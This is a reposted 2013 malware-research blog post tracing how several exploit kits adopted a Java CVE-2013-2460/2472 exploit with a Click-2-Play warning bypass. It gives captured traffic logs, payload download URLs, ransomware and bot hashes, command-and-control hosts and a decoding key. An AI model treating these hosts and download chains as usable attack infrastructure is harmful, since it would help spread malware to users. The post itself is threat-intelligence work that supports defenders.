Nytro Posted October 1, 2013 Report Posted October 1, 2013 [h=1]jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits[/h] A new variant of a "Kore-ish" Cool EK appeared few days ago.Yes...it's difficult to follow the EK fast moving landscape...No payload in the jar for that one.[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Some instances of this "Cool EK" in URLQuery[/TD][/TR] [/TABLE] I faced it often where I used to see Kore (aka Sibhost) Exploit Kit.It is also used to spread the Urausy Ransomware and FakeAV (so... BestAV stuff)All jar found there were identical as those in Blackhole. Till today.CVE-2013-2460 + Click2Play Bypass : That CVE was already in use in Private Exploit Pack but it was noisy (Imposition then made it optional )[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]CVE-2013-2460 successfull path in Cool EK (Kore-ish)Click2Play Bypass inside 2013-09-20[/TD][/TR] [/TABLE] GET http://[redacted].tacogratis .com/index.php?p=5267200 OK (text/html)[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Key Piece of the landing[/TD][/TR] [/TABLE]GET http://[redacted].tacogratis .com/index.php?p=5290200 OK (text/javascript)GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30200 OK (application/java-archive) GET http://[redacted].tacogratis .com/index.php?p=5268200 OK (application/java-archive)GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14200 OK (application/x-msdownload) 170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)----- Off Topic ----Payload is rotating fast (2 more md5) :b56348220f83ad9db50cb5beb564148b64ef8f2cb215af4b2fbcb51cadfcc025[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Urauy Ransomware - DE design - 2013-09-20(BestAV soft 2)[/TD][/TR] [/TABLE]Note : on another thread you can get a FakeAV[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Payload call with bigger charge[/TD][/TR] [/TABLE]9d8d3094849f685859945140721aafb17fb9423c4bdf7080137745e81ba3836213e24b552ea472146495ac8a33cca975[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Other payload from this "Kore-ish" Cool EK(BestAV Soft1)[/TD][/TR] [/TABLE] -------------------So what's that Click2Play bypass ?Quite surely : Bugtraq: VUPEN Security Research - Oracle Java Preloader Click-2-Play Warning Bypass Vulnerability2013-06-18 - Vulnerability Fixed in Java 7u25Yes :[TABLE=class: tr-caption-container, align: center] [TR][TD][/TD][/TR] [TR][TD=class: tr-caption]Warning with jre7u25(and as CVE-2013-2460 is patch too...clicking on run there won't put you at risk) [/TD][/TR] [/TABLE] It's the first time I see that.5 days ago :Who sold it ???No download link for now. Yes it will spread fast anyway.It's easy to get rid of all these Exploit Kits : update !<edit1 2013-09-21>Already in Sakura...surely cause of that blog post. It's often difficult to decide how much you can write about something.Sakura CVE-2013-2460 & Click2Play Bypass : [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center] Sakura featuring CVE-2013-2460 & Click2Play bypass 2013-09-21 [/TD][/TR] [/TABLE] GET http://[redacted]253 .pw:8509/me.php200 OK (text/html) [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Precision Strikenew Click2Play bypass for 21 version[/TD][/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Jnlp call[/TD][/TR] [/TABLE] GET http://[redacted] .pw:8509/[redacted].ee200 OK (application/java-archive) dca89d839abbb8f621a87de94d20d8f2 CVE-2013-2460 [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Piece of CVE-2013-2460 in Sakura Jar 2013-09-21[/TD][/TR] [/TABLE] GET http://[redacted] .pw:8509/bodystarswild.ee 200 OK (application/java-archive) GET http://[redacted] .pw:8509/2889.ld 200 OK (application/octet-stream) Once decoded : 5fba8226303967ccfd27ea8710a8b99d I think it's a Smokebot ----- Off Topic ---- C&C Calls : mexstat757.com POST /satep757/index.phpmexstat220.pw GET /setex/sev57.exe mexstat220.pw GET /setex/pm555.exe etc... 46.165.201.27 16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH It's the same guys than those who were behind this one year old post : From Sakura to Reveton via Smoke Bot - Or a Botnet Distribution of Reveton 2012-09-12 Since then Smoke Bot is now encrypting its network calls. Analysis by Joe Sandbox Cloud ---------------------- </edit1><edit2: 2013-09-23>Nuclear Pack : CVE-2013-2460 + Click2Play bypassAnnounced Underground :"???????? ???? exploit, ?????? ????????. ???????? ???? ? ?? ???????" Nuclearwhich means something like:"New exploit added, breaking rate increased, works silently and scorched"[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]CVE-2013-2460 with no security prompt successful path in Nuclear Pack2013-09-23[/TD][/TR] [/TABLE]GET http://[redacted].flogdoyfohoqobl .biz:12421/3dfa4ffa555573ba6fbb54a243289806/4/5b1bb46b5a96bee3ebbb1d2251d968bb.html200 OK (text/html)[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Precision Strike (Thanks @EKWatcher )[/TD][/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]jnlp call in Nuclear PackAfter Deobfuscation (Thanks @EKWatcher )[/TD][/TR] [/TABLE]GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar200 OK (application/java)GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar200 OK (application/java) e03455403f226b23be42b30733a26101[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Piece of CVE-2013-2460 in Nuclear Pack 2013-09-23[/TD][/TR] [/TABLE] GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2200 OK (application/octet-stream) Decoded : 3a9d1dcad1176717711eb92b25f7d6b0GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2/2200 OK (application/octet-stream)----------- Out of Topic -----------C&C :185.6.80.125 - 61422 | 185.6.80.0/24 | TD-VITA | RU | - | TD-VITA LLC.for instance :POST /mBj7cjhH/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/4.0Host: halifaxkilo.comAnalysis by Joe Sandbox Cloud------------------------------------</edit2><edit3>Styx CVE-2013-2472 + Click2Play Bypass :Many Thanks to Timo Hirvonen from F-Secure for identifying the CVE. [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Reveton Pushed in Styx 2013-09-24Using CVE-2013-2472 & Click2Play Bypass on jre7u21We can see the call for Bitcoin miner after VM Reboot.[/TD][/TR] [/TABLE]GET http://[redacted].info/hsZv/3J17_DtR/13C_ht11nF-E17H_R60kufr_0HUzD0c/xrB/055RR0/iWsU0-VEw-x0Rm-ou0xvC-3/302 Found to http://an-wis.info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/200 OK (text/html)GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/yavirts.html200 OK (text/html)GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/jplay.html200 OK (text/html) (jnlp call) [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Click2Play Bypass in Styx 2013-09-24[/TD][/TR] [/TABLE] GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/NyJjQvjE.jar200 OK (application/java-archive) GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/NyJjQvjE.jar200 OK (application/java-archive) 3c812730758b9118ba4764adf3ab53bcGET http://[redacted].info/r007gL_0e2X80Ooo-30N1XG/0C/rt/d0tg2C-0e_l6L0H_NL40C05W/0aDec0A/b5g-04-yuI0i3/KS00i/AE0m/VuD0uHFw0/pRgP0Dy-z80J_Aek0Y_hcr0AhC_80_lWyk13f/It0865-L0O_GKn-0E/1dA0baP00-1EAC0QAs/R0f-4Bq0ZIn-f0X_4n-30otyr-05Y83-0ZxLA/17y/RZ0I/MM60-Ajpo06eml/0gVj_P0Yv3E0MRn/30AF6J0H/9ZU0f/WRI0wAPs11/ttO0CZz_j0leh-i0k1X_l0oDdd_0ah_pC/kC4XSO15ZD.exe?lniV=7decb&h=16200 OK (application/x-dosexec) 4a0e95c28b2b5b6259b7b558c3565988----------- Out of Topic : Payload -----------Reveton.C&C Reverse Proxy : [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Reveton Calling Home2013-09-24[/TD][/TR] [/TABLE] 64.191.122.10 - 21788 | 64.191.0.0/17 | NOC | US | NOCINC.COM | NETWORK OPERATIONS CENTER INC.We can see the call to the Bitcoin Miner (read: Ransomware Puts Your System To Work Mining Bitcoins )The binary is not there anymore since 2013-09-11 (was : 2794fd5b64b585df132b4524b82d18c8 )--------------------------------------------------</edit3><edit4 : 2013-09-24>Neutrino : CVE-2013-2460 + Click2Play bypassIt seems the integration has been far from smooth for the Neutrino coder.The jar is inside the Exploit Kit since more than 3 days. The coder announced the new exploit 2 days ago...but the warning was still here and even validating the execution your were safe. Some protections were removed (you could hit the exploit kit as many time as you want with same IP without problem...seems like someone else was testing it ). And the 22 (sunday) more than half a day with all threads in 404...But in the end...he made it.[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]CVE-2013-2460 + Click2Play ByPass in Neutrino2013-09-24[/TD][/TR] [/TABLE] Will only keep relevant calls :GET http://[redacted].dyndns .info:8000/gxstfkhf?ttdwjipi=4128154200 OK (text/html)GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js200 OK (text/javascript)GET http://[redacted].dyndns .info:8000/index.js200 OK (application/x-javascript)POST http://[redacted].dyndns .info:8000/twpnnurhbg200 OK (text/html) [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Encoded Jnlp[/TD][/TR] [/TABLE] Applying the Neutrino "xor" function with key "qoxacfix" [TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Jnlp[/TD][/TR] [/TABLE] Base64 decode of the jnlp_embedded value : GET http://[redacted].dyndns .info:8000/rclmrcfdvdjtq?joiihv=uihuzdhhuq200 OK (application/java-archive) GET http://[redacted].dyndns .info:8000/rclmrcfdvdjtq?joiihv=uihuzdhhuq200 OK (application/java-archive) 3fcac6c64ce0ca28ee615a8fad224dd3[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Piece of slightly obfuscated CVE-2013-2460 in Neutrino(since 2013-09-21 in fact)[/TD][/TR] [/TABLE]GET http://[redacted].dyndns .info:8000/faybcc?juzickeew=uihuzdhhuq200 OK (application/octet-stream) Decoded : a126281477c856b9358de5aea1369990 who drop : 898b9aee9931230ef3bc0c59eb541c55 - Didn't spend too much time to figure out what it is.Saw 404 POST to : http://allewnuado .ru/perl/config.php - 79.174.64.127 47385 | 79.174.64.0/19 | HOSTING-COMPANY | RU | HC.RU | HOSTING CENTER LTD. </edit4><edit5 2013-09-25>Blackhole : CVE-2013-2460 Click2Play BypassI saw that jar yesterday already being pushed without exploitation to jre7u21 in /closest/ Blackhole.It's the exact same jar as the Cool EK in "/index.php?p=" that introduce the Bypass.Today on the /Home/ (aka q.php) Darkleech fuelled BH EK the Click2Play bypass is here.And payload is as always Pony (steal passwords and act as loader. No change since at least December. It pushes Urausy in some countries or Nymaim in other countries (which can then get another version of Nymaim with locker functionnality or Zaccess).This has been well explained by Eset.[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]BH EK /Home/ aka q.php CVE-2013-2460 + Click2play bypass2013-09-25[/TD][/TR] [/TABLE]GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php200 OK (text/html)[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]Conditions for the bypass call[/TD][/TR] [/TABLE][TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]jnlp call[/TD][/TR] [/TABLE]GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?!0M!6J=1F_*H4z-I*!f&Jk__*zFA_92-*=7*K9_Kp1200 OK (application/java-archive) GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?!0M!6J=1F_*H4z-I*!f&Jk__*zFA_92-*=7*K9_Kp1200 OK (application/java-archive) f5fc4540e6e64efee8711007ac0d4ed1[TABLE=class: tr-caption-container, align: center] [TR][TD=align: center][/TD][/TR] [TR][TD=class: tr-caption, align: center]CVE-2013-2460 in BH EK2013-09-25[/TD][/TR] [/TABLE] GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?-*Z73922k0NUj8=8b8cwd8aww&*F21!gX=w88c8dw6wdw7wbwbwd8c&!_239!6W25u*_=ww&59*!a34-d1_2!uT=u*g88*8&OF2EFwol0!3_9=7ZF!Y*08*!P_75m200 OK (application/x-msdownload) - acb80f0eaa177953a53f3be188c8e3da Analysis and sample: Malwr.com</edit5> Posted 1 week ago by Kafeine Sursa: Malware don't need Coffee: jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits Quote
